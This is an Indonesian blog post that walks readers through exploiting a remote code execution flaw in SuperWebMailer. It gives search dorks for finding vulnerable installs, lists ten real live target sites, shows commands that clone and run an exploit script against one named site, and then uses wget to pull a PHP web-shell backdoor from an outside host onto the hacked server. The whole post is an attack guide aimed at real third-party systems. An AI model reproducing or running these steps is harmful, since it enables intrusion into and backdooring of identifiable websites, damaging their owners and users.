Ad Unit (Iklan) BIG

SuperWebMailer Remote Code Execution (RCE)

Post a Comment
-
Hai sobat.
Saya ikal
Disini saya akan share exploitasi yang berhubungan dengan remote code execution (RCE)
-

Jadi, Langsung saja
Bahan :
- Dork: inurl:/show_na.php?
            intext:powered by SuperWebMailer
            inurl:/browser.php?key=twitter
            inurl:/browser.php?key=01
            inurl:/browser.php?key=02
Note : selebihnya kembangin sendiri
- Termux : bisa download di playstore
- uploader & Shell backdoor : http://flickr.com.laptoptuanminh.com/gasno.php
- Tools exploiter
- Live target:
https://www.messerli.ch/mailer_/app_swm/
https://die-liebenden.org/wp-content/swm/
https://www.pyd.de/swm/
https://news.bbk-falkenstein.de/
https://news.tap.de/
https://newsletter.determann-touristik.de/
https://newsletter.kreis-borken.de/
https://www.erlebnistage.net/superwebmailer/
http://ruka-hw.de/smmb/
https://www.schmuckclub.de/newsletter-swm/

1. Tahap instalasi tools
Jika sudah mendownload atau memiliki termux, langkah selanjutnya adalah ketik perintah berikut ini :

$apt update && apt upgrade && pkg install python git
$git clone https://github.com/Aryaalfahrezi010/RCE_SuperWebMailer && cd RCE_SuperWebMailer
 
Nah itu perintah untuk installasi tools exploitnya.
Jika tools sudah terinstall, lanjut kalian ngedork dan mencari target. Atau jika klian malas ngedorking, kalian Bisa gunakan live target diatas.

2. Tahap eksekusi.
Jika sudah ada target, lanjut ke tahap eksekusi. 
Kalian balik ke termux dan ketikan perintah ini
$python exploit.py -u https://lon-te.online/[path SWM]/
Contoh
$python exploit.py -u  
https://www.schmuckclub.de/newsletter-swm/

 

Penampakan jika target kalian vuln adalah seperti gambar diatas, akan muncul id dan uname target kalian.

Selanjutnya kalian tinggal spawn shell menggunakan command wget
contoh : 
wget http://flickr.com.laptoptuanminh.com/gasno.php -O vy.php


Maka file akan tersimpan di path swm dengan nama vy.php kalian tinggal akses saja shell backdoor kalian. Selanjutnya itu seterah kalian mau di apakan.

Gre3tz : Mr.TenAr

Thanks 
See u
Haikal_
Hai sobat, Saya ikal. Disini kalian bisa learning mengenai sesuatu dari setiap artikel yang saya buat :D.

Related Posts

Post a Comment

Dapatkan Notifikasi Dengan Email